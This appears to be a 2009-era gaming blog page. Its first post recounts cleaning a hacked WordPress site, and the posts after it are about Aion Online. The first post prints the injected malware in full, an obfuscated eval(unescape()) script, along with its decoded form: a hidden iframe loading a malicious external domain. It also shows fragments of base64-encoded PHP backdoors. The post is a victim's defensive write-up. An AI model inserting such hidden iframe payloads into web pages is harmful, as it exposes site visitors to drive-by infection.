Spring Cleaning – Of Hacked Files
I do feel like I have to post an apology. Even though I try my best to try to stay virus free, apparently some still slip through. I recently decided I would upgrade the Wordpress version to a newer one, and ran into some difficulties/error messages and such. Like the Wordpress Dashboard reloading or getting redirected to some url like: iss9w8s89xx.org or something. I’m not sure how long ago the blog was compromised so my apologies to the visitors of the site.
After some searching I found the source, and cause of my problems. Apparently it was caused by using CoreFTP, and saving the password in that program which some virus on my computer managed to get into. Which then got access my Wordpress blog.
Especially noticeable was the code fragment which appeared on the bottom of every page:
script language=”javascript”>eval(unescape(“%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B”))</script>eval(unescape(“%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B”))</script
Which appeared at the bottom of every single page which after some searching around on the net converted into:
script language=”javascript”>eval(unescape(“document.write(‘<iframe src=”http://iss9w8s89xx.org/in.php” width=1 height=1 frameborder=0></iframe>’);”))</script>eval(unescape(“document.write(‘<iframe src=”http://iss9w8s89xx.org/in.php” width=1 height=1 frameborder=0></iframe>’);”))</script
I used a java unescape decoder to decode the script, if anyone was curious.
Oddly enough this code wasn’t in any of the files, but I later found out that many of the php files in my site had fragments of code like:
eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvY
or
Y29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1
etc
If anyone else runs into similar issues with their blogs go to:
http://www.google.com/support/forum/p/Webmasters/thread?tid=6f4cf473c414de1f&hl=en
For the solution on how to fix/clean your Wordpress blog of the hack/backdoor.
Some other useful links for me this time around was:
How to find a backdoor in a hacked WordPress
http://tools.tortoisesvn.net/grepWin – program I used to strip the code from my pages.
Anyways hopefully I managed to clear out all of the nasty scripts from the site, but if anyone notices anything abnormal send a message through my contact form.
Some parts of the site, or links may have become broken due to cleaning/stripping the malicious code so I would appreciate it, if you do notice it, to bring it up to me.
Popularity: 1% [?]
Happy Holiday! Goodbye 2009
I just wanted to wish everyone a Happy Holidays. Party safely, play safely, and see you all next year!
Popularity: 2% [?]
Aion Online – Cube Expansions
Well I was going to put up a post about how to expand your cube to a full 10 lines worth of space, but Zumbaro at Aion Insider has already posted one. So if you’re in need of more cubespace (aka inventory room). Head on over there to find out how to max it out. Only note worth mentioning is that the NPC Vindachinerk spawns at the Ruins of Roah location in between 1am-6am pretty much all the time. I’ve never seen him at the other locations personally, though this may just be bad luck on my part.
Popularity: 3% [?]
Aion Online – Live Status Tools – Freaking Awesome
When Warhammer was released, and they had an updated ranking information with the realm ranks and everything I was stoked to be able to see a realm time updated database of players, their gear, and their current exp/renown rank via the Character Search function they had. However NCSoft’s Live Server Status for Aion is definitely superior. You can check you population ratios for servers, characters, character gear, character stigmas, abyss points, and you can even check you in game mail/auction house item sales. There’s even a 3D character model that you can view to show off your character. Wow. Just simply amazing.
And in case you’re wondering what I’m up to, here’s my character Xight on there.
Popularity: 2% [?]
Return of The Player – Aion
Now its been quite a while since I last posted anything on here, but I’m just writing to let you all know that I’m alive, and still around. This past summer has been rather exciting of late with meeting new friends, and what not. Also since I live here in Maui I figured I go out, and catch some sun before getting trapped in my room from the next new MMORPG to come out. I know that I’ve been ranting about wanting to play something new now, and I think we’ve found our candidate. Aion. I’ll be looking into this while its going under open beta. Which if you would like to play, you can download/play it now with a preorder.
Popularity: 1% [?]
